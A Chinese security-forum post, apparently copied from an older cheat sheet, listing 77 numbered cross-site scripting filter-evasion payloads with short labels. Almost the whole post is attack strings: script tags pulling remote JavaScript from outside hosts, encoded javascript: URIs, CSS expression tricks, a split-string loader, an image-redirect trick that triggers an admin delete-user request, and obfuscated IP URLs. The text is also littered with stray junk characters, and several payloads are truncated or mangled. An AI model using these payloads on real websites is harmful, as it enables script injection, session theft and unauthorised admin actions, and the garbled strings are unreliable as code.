貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
3 t) G9 ^& l0 d9 D5 w$ n(1)普通的XSS JavaScript注入
- G' C! M. m, Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>9 W7 G7 H9 c/ n: b5 y
(2)IMG标签XSS使用JavaScript命令
6 w, X4 P0 i& K- T+ h<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# Y. |1 O- n9 z8 U, F; Y8 X D(3)IMG标签无分号无引号4 F, u: n' N! v# H7 m
<IMG SRC=javascript:alert(‘XSS’)> T8 r1 G! n) P4 B# d( m% ~0 j% `
(4)IMG标签大小写不敏感1 Y. a& [* D* L0 _9 G% ^
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 ~, O1 Q* n& B4 A1 a/ b(5)HTML编码(必须有分号)8 A [7 f# L1 d
<IMG SRC=javascript:alert(“XSS”)>
& z3 P9 R( v/ H7 |(6)修正缺陷IMG标签; N7 l7 D7 v* r2 t
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 l1 ~1 [$ |% p2 B, n+ d& `' P1 o% b0 G' B' }
& `2 f# L* T. M: `2 T6 p
(7)formCharCode标签(计算器)
8 C) G9 D& T- r, O2 \% Y<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>: I+ s& z. ] T
(8)UTF-8的Unicode编码(计算器)
) n. C4 w' S3 M& v0 z! Y6 }% _<IMG SRC=jav..省略..S')>
. a4 K, g" U3 a. L+ ?/ x(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* t4 \, k2 y) t8 {
<IMG SRC=jav..省略..S')>
1 D* y; l d9 ~( M* n3 k2 R8 o(10)十六进制编码也是没有分号(计算器)
( m: Q# {, i- p+ H<IMG SRC=java..省略..XSS')>2 x4 e5 W8 F9 z& W3 F: e, w
(11)嵌入式标签,将Javascript分开7 f: n' X7 R' L
<IMG SRC=”jav ascript:alert(‘XSS’);”>% d& |3 Y& J! m" W5 s. Z0 H
(12)嵌入式编码标签,将Javascript分开
$ G9 ^' a# n: c! g$ E& |& t; D<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ A0 y4 a% X- t# x$ k _(13)嵌入式换行符1 S) [0 c# r* H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 [) z' Z/ T) z4 p9 S(14)嵌入式回车
6 u i* x3 d, t, B<IMG SRC=”jav ascript:alert(‘XSS’);”>
% Y; k+ p' G! s6 [8 V(15)嵌入式多行注入JavaScript,这是XSS极端的例子9 `* E0 l/ ~1 X
<IMG SRC=”javascript:alert(‘XSS‘)”># p. M. p( o5 y" e& ]# r
(16)解决限制字符(要求同页面)* r6 B# c0 L) m8 V3 }! d% S
<script>z=’document.’</script>
' u) A/ J9 e. ^8 t. O" ]8 e<script>z=z+’write(“‘</script>7 I2 E6 i4 w4 H- g
<script>z=z+’<script’</script>
0 v! Z: a' H: \: c& A& r) p9 i, w<script>z=z+’ src=ht’</script>
0 s! x7 v6 } |: ^! V# y<script>z=z+’tp://ww’</script>9 A q- h$ Q9 M, T) [
<script>z=z+’w.shell’</script>0 e* I' {+ _, ?4 D/ S
<script>z=z+’.net/1.’</script>$ f% M4 ` I' u0 x7 ^" Q
<script>z=z+’js></sc’</script>; w. ~" `9 ~: W" z. ~
<script>z=z+’ript>”)’</script>
0 C1 ^2 g+ [ f* u5 m5 L+ _<script>eval_r(z)</script>- S. w! N! l" t2 P- ?& T I% h
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
8 F. P. f( d/ L; V2 Phttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
+ \( b$ x$ j% ?& L7 [2 xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 d5 x$ d% p# Q6 M- ?( ?(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, c: s) n7 \/ l$ N* M% C( `perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out, W; I0 Q6 ? \! z) C; S3 @
(19)Spaces和meta前的IMG标签# a% j, S. o3 I% f, z
<IMG SRC=” javascript:alert(‘XSS’);”>& R: ?6 W1 }' ?$ ~" L
(20)Non-alpha-non-digit XSS
7 [$ X: J0 {0 r7 g1 o<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
3 j: L- w5 j5 G(21)Non-alpha-non-digit XSS to 2
; j, L" a& D' t- P D<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
5 ^6 c( d& _) S7 o3 c(22)Non-alpha-non-digit XSS to 3. ~- _" F7 L2 Z9 u' A6 w2 Y) G* _9 u
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 j6 c X' d# f' V
(23)双开括号
0 }* ~2 G" f- K: p' F<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# k/ W9 i9 W, j- s' s8 y(24)无结束脚本标记(仅火狐等浏览器)
/ S& t7 Z. t3 a. F( V$ p+ i9 L<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ _. e, S( s' ~: t- u(25)无结束脚本标记2
4 c7 g V9 x* S8 n<SCRIPT SRC=//3w.org/XSS/xss.js>0 |; n5 f9 n$ v5 H4 H; ]
(26)半开的HTML/JavaScript XSS
* S$ x2 m' n$ G, J* S$ A1 n9 S1 v<IMG SRC=”javascript:alert(‘XSS’)”
Q, |; U% t6 }(27)双开角括号# C# _2 K5 g+ U+ E' l. v$ k
<iframe src=http://3w.org/XSS.html <, D; f/ s$ K7 Q$ f( c! n' G
(28)无单引号 双引号 分号5 ~7 b3 |( R# O n6 R0 k3 _
<SCRIPT>a=/XSS/# o) V" z) {+ u' ~
alert(a.source)</SCRIPT>' q$ z$ h( g0 k' Y4 g% w
(29)换码过滤的JavaScript9 d% X9 h7 g* g
\”;alert(‘XSS’);//+ t5 E W" @9 i
(30)结束Title标签% `6 W, Q$ K d% L/ P9 @
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! N* G4 p& }% i, ^! l
(31)Input Image4 t- w$ s% `$ ~: g4 F
<INPUT SRC=”javascript:alert(‘XSS’);”>$ {3 S! P& E7 M4 u
(32)BODY Image
9 f; O$ ~. v- B1 P/ m# Z2 z4 d2 e<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
( R8 d* X3 ~9 B' K(33)BODY标签
) M! w$ }# ~; U% X# M<BODY(‘XSS’)>
) ^8 |/ b& E ]& V2 M(34)IMG Dynsrc1 Z0 ?( ]" Y x0 x7 [
<IMG DYNSRC=”javascript:alert(‘XSS’)”>; Z! R& D; g" B
(35)IMG Lowsrc
# l. [% l W( p) L<IMG LOWSRC=”javascript:alert(‘XSS’)”>
! \( b2 r& g) L# Q& z(36)BGSOUND
* `8 P) b9 G+ l* m<BGSOUND SRC=”javascript:alert(‘XSS’);”>) Z) b& t9 F4 J
(37)STYLE sheet
& A& u5 ^# G# T& _' E<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, k0 W3 D+ t3 d" ^# q
(38)远程样式表
- q. B* j c( N$ n8 c4 K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 k8 H7 [0 I" T2 e' E. S
(39)List-style-image(列表式)* e) L& p5 h: Q
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
7 z; v6 ^3 ]- Z% c$ z4 c(40)IMG VBscript
7 f/ W/ h# q; v. d' {<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
# [* j Y% G: R8 K9 w(41)META链接url
8 Q# r4 n: K: u( R- l7 P
0 Z, R) b8 D+ C* v3 O
" o, g$ P4 ]/ J8 ]1 f; l<META HTTP-EQUIV=”refresh” CONTENT=”0;9 y' l/ g! s F6 c! R: @6 F% l Y
URL=http://;URL=javascript:alert(‘XSS’);”>; w; V* X4 t- B0 y
(42)Iframe
- j+ U- n. e2 \2 l y* o% _<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>, y) C# I( i ?+ V2 \' i$ ]
(43)Frame' b% N1 \- v7 d5 p
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board0 K" i: C5 ?+ J/ q
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
T1 t, t3 M: S3 } O( b(44)Table
$ @) l8 w) r# D6 O* V<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 ^* K& j% |7 a5 R! ]7 s(45)TD
* U' ~% Z ^ A7 P2 g+ ^+ B) L$ X<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
6 |* a! }' ]+ ^3 m; j+ @; e(46)DIV background-image/ `* q' U5 \7 `8 Q _
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' W, G& W" c; o" G" z- g; A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-0 e* v+ ^! }6 v' q% A
8&13&12288&65279): P# V* v6 w' m) [ f
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ k: F0 [8 {- m# ^; \5 t( ^ m& C
(48)DIV expression
1 q" q% v# @7 l0 d$ k<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ K; G% j5 l$ m, p
(49)STYLE属性分拆表达
/ T% ^; ^; w+ F7 y5 b<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>* ^( c& E* F' w% w7 d- X/ P* _( u
(50)匿名STYLE(组成:开角号和一个字母开头)
% ?5 ^+ |: A1 g9 Q6 [<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
6 r2 d/ P1 X$ u7 y* ?3 w3 q- v7 x(51)STYLE background-image# p: A6 f: A$ @( O* v) d) q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
; \# E0 T( Q5 e% l0 Q% y( Y2 b1 M+ UCLASS=XSS></A>0 R3 v) ?( P, k! t1 m3 D ?
(52)IMG STYLE方式! N5 @. a: I5 Y2 k
exppression(alert(“XSS”))’>
' |% k5 P$ k* U% B) H o' \(53)STYLE background) }) O' J4 ]2 ~' [
<STYLE><STYLE
( K j! V1 k) o) x- `) a; n# ltype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# W$ i6 Q4 S4 c7 [, {(54)BASE# q/ S# u2 v$ i e
<BASE HREF=”javascript:alert(‘XSS’);//”>' r% P! R5 G! E; l0 g1 D
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 Y0 |; f, b% D V; E8 {* @0 s- }<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
0 S& T/ Q3 [ R0 O7 y0 s/ q" N' I1 E(56)在flash中使用ActionScrpt可以混进你XSS的代码
) U; t4 M1 m. z' y0 m8 a- Ca=”get”;8 R* V( A, p5 B. E! K
b=”URL(\”";8 y+ @5 u {/ d7 G& q" s" @% x
c=”javascript:”;. O- f4 ?0 f7 L" B
d=”alert(‘XSS’);\”)”;
7 ^" s' J1 E1 g: r. Weval_r(a+b+c+d);
( v: j) o: ?, i1 ^9 f, p(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
9 Y! d9 v9 W9 I1 ^. n6 k. L<HTML xmlns:xss>
( W0 E$ {( \3 Y% x E1 C<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
, H5 _2 ? Q ?* {4 j/ N6 |( Q; L, w<xss:xss>XSS</xss:xss>" \: T6 i4 [1 b
</HTML>0 {' h0 n% A' Q8 } I8 I
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用% G* h }9 K+ `
<SCRIPT SRC=””></SCRIPT>
& l+ ]& ?/ A1 L& y# _# `& K(59)IMG嵌入式命令,可执行任意命令
+ C2 r+ \ z: m<IMG SRC=”http://www.XXX.com/a.php?a=b”>
! j0 ^' r) C, Y1 d) k+ E+ ?5 Q(60)IMG嵌入式命令(a.jpg在同服务器)
G4 n, o* D# ]9 A3 _) k GRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 g2 n1 ?. v7 M h3 J( `8 {(61)绕符号过滤6 L& f0 d: b: X" x
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 i+ K! D O) A* z! a4 t(62)
6 h% M4 f; `% L: R<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 F2 K- k; P* @. w(63): j' c- b! S2 i3 J4 P5 ? a: y4 g! V6 B
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>* Y# A" c0 K- @+ N$ x( x+ M+ K% L
(64)2 y8 D2 q7 A: i/ T1 j* K# U
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>- n. o0 }( n3 ]: J* B" @
(65)
. b# P5 E6 r+ Z<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
# { J# E5 M2 M+ O) J2 I, c8 f(66)12-7-1 T00LS - Powered by Discuz! Board
4 b# _1 N/ Y0 Q8 Q/ m6 M$ |https://www.t00ls.net/viewthread ... table&tid=15267 4/6' c1 z, @$ `4 q: b$ t
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>8 l6 L4 w2 x& s! ^7 o. Y* T2 J
(67)7 b5 ]4 l" V/ I/ A& n. P
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
. o, V4 \- ?6 ]4 {7 I8 U [1 u</SCRIPT>* K9 h' L5 v+ ^$ Q
(68)URL绕行
& `; A, C5 h) {<A HREF=”http://127.0.0.1/”>XSS</A>1 q/ i1 S" U4 _
(69)URL编码
$ U, N7 y- S8 n% e( y<A HREF=”http://3w.org”>XSS</A># r# w, O }+ C0 i5 d9 e
(70)IP十进制
+ L8 b! z0 B6 D8 q<A HREF=”http://3232235521″>XSS</A>- q' n* m; G% S4 P8 T( W4 J
(71)IP十六进制
7 ~' @8 g2 o9 _' I% h<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>8 o: v2 j8 L, f% l$ j$ F; U) I ]
(72)IP八进制: ]! l x! E) @- Z, a7 y
<A HREF=”http://0300.0250.0000.0001″>XSS</A># J; p' e) H3 N) Z; t |. O) h
(73)混合编码
: l6 I$ s; _! ~5 X1 |9 Y; v<A HREF=”h1 P& w$ x% S4 K. a& I- F
tt p://6 6.000146.0×7.147/”">XSS</A>
, r7 a# t$ J6 S(74)节省[http:]% {# g9 F0 C7 Q( G& Y7 E) g
<A HREF=”//www.google.com/”>XSS</A>
5 M- U' L" o6 _# M(75)节省[www]
" A# c8 ^! ^! v$ F' ~ X; {<A HREF=”http://google.com/”>XSS</A>
+ y+ `% w. N5 I4 m; c(76)绝对点绝对DNS
0 R D( N! h. v' F8 h$ [3 F7 D<A HREF=”http://www.google.com./”>XSS</A>
- K/ `% @) K. ?. S: ^/ Y) x+ M(77)javascript链接
0 W2 Q, [3 l, n' d. K<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>- w: b' A3 T3 u6 e0 t2 R$ S! @0 g
: P: J; R% f# Q9 x) P
原文地址:http://fuzzexp.org/u/0day/?p=14
; n8 x9 F+ p0 }( Y
" W' d. @) b7 I( v2 R: J( z6 Q |
发表于 2013-4-19 19:22:37
收藏
支持
反对